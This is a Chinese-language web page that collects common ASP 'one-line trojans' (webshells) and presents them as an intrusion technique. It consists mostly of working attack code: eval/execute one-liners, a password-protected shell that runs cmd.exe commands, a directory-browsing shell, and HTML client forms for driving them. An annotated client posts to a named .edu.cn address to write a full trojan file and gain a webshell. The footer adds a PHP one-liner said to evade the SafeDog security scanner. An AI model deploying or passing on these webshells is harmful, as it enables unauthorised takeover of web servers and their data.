服务器配置

asp常用的一句话木马大全

精准像素 2020-09-29 人阅读

【入侵技术】 ASP一句话木马大全

<%eval request("MH")%>
<%execute request("MH")%>
<%execute(request("MH"))%>
<%If Request("MH")<>""Then Execute(Request("MH"))%>
<%if request("MH")<>""thensession("MH")=request("MH"):end if:ifsession("MH")<>"" then executesession("MH")%>
<SCRIPT language=VBScriptrunat="server">executerequest("MH")</SCRIPT>
<%@ Page Language="Jscript"%>
<%eval_r(Request.Item["MH"],"unsafe");%>

1asp一句话木马

一句话木马 服务器端

带验证:

cmd.asp

<%
if request("authkey")="pic16f873a" then
%>
<textarea readonly cols=80rows=25>
<%response.writeserver.createobject("wscript.shell").exec("cmd.exe /c"&request("cmd")).stdout.readall%>
</textarea>
<%
end if
%>

带验证 客户端

cmd.html

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=gbk">
</HEAD>
<div align=center>
<FORM method=post name=frmtarget=_blank>
Host:<input type=text name=act size=65value="http://">
<br>
<br>
Cmd :<input type=text name=cmd size=65value="cmd">
<br>
<br>
<input type=hidden name=authkeyvalue="pic16f873a">
<Input name=Send
onclick="Javascipt:frm.action=document.frm.act.value;
frm.submit();"
type=button value="Send Command">
</FORM>
</div>

目录浏览

服务器端

<%
if request("authkey")="pic16f873a" then
szPara = Request.Form("path")
set shell=server.createobject("shell.application")
set dir1=shell.namespace(szPara)
set diritems=dir1.items
for each iii in diritems
response.write iii.path & "<fontcolor=blue>[" & iii.size&"]</font><br>"
next
end if
%>

客户端

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=gbk">
</HEAD>
<div align=center>
<FORM method=post name=frmtarget=_blank>
Host:<input type=text name=act size=65value="http://">
<br>
<br>
Path:<input type=text name=path size=65value="C:">
<br>
<br>
<input type=hidden name=authkeyvalue="pic16f873a">
<Input name=Sendonclick="Javascipt:frm.action=document.frm.act.value;frm.submit();"
type=button value="Send Command">
</FORM>
</div>

一句话木马客户端源文件:

里面涉及到一些脚本知识,我就只讲解一下功能和简单注释,不详细讲了,大家只要注意几个注意点就行了

<form action=http://cjy.xjife.edu.cn/news/ebook/db/ebook.aspmethod=post>
//"action="后面是需要修改的以asp命名的数据库的提交地址
//这个标签的意思是建立一个表单 以post方式提交给连接http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp处理
<textarea name=value cols=120 rows=10width=45>
//这里的value值根据服务端<%executerequest("value")%>中value而设定
//可以自行修改成<%executerequest("p")%>相应这里的value值也必须改为p
setlP=server.createObject("Adodb.Stream")//建立流对象,有了对象才可以使用它固有的属性和方法
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("joeving") //取得木马内容 参数joeving可以自己定义但必须和下面的name=joeving相对应
lP.SaveToFile server.mappath("wei.asp"),2
//将木马内容以覆盖文件的方式写入wei.asp
//2就是已覆盖的方式,这里的wei.asp也是可以自己定义的,如定义成1.asp
//但和下面的response.redirect"wei.asp"中wei.asp的保持一致
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "wei.asp"//转向生成的wei.asp和上面的wei.asp相对应,也就是你熟悉的asp木马登陆界面
</textarea>
//这段程序的功能:利用插入到数据库文件的<%executerequest("value")%>这段代码执行第一个textarea中的内容,并将添加的木马内容写入和指向wei.asp,这样就相当于在服务器上建立了个asp木马文件,这样就可以取得webshell了
<textarea name=joeving cols=120 rows=10width=45>添入生成木马的内容/textarea><BR><center><br>
//这段标签是你用来添加木马内容用的
<input type=submit value=提交>
</form>

程序的主要框架是

<form>
<textarea></textarea>//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示
<textarea></textarea>//添加木马内容用的
</form>

其实都是些很简单的一些html和asp的知识,大家不妨自己写个自己的木马客户端~~~哈哈

相关推荐
  • 网站木马
  • DedeCMS后门木马专杀工具V2.0
    DedeCMS后门木马专杀工具V2.0

    “DedeCMS顽固木马后门专杀工具”为安全联盟站长平台针对DedeCMS爆发的90sec.php等顽固木马后门而定制的专杀工具。在前面我 们推出的第一个版本里收到了很多DedeCMS站长的肯定。于是我们决定推...

    织梦cms插件 1071 1年前
  • 可绕过安全狗检测的一句话网站木马

    安全狗目前是一个很让人头疼的玩意,不过好在是,想让狗狗听话还是很容易的。今天先发布一个可以绕过安全狗检测的马儿。<?php preg_replace("/[errorpage]/e",@str_rot13(&#39;@nffreg($_CBFG[cntr]);&#39;),"saft"); ?>密码page...

    服务器配置 299 1年前
  • asp常用的一句话木马大全

    【入侵技术】 ASP一句话木马大全<%eval request("MH")%><%execute request("MH")%><%execute(request("MH"))%><%If Request("MH")<>""Then Execute(Request("MH"))%><%if request("MH...

    服务器配置 49 6个月前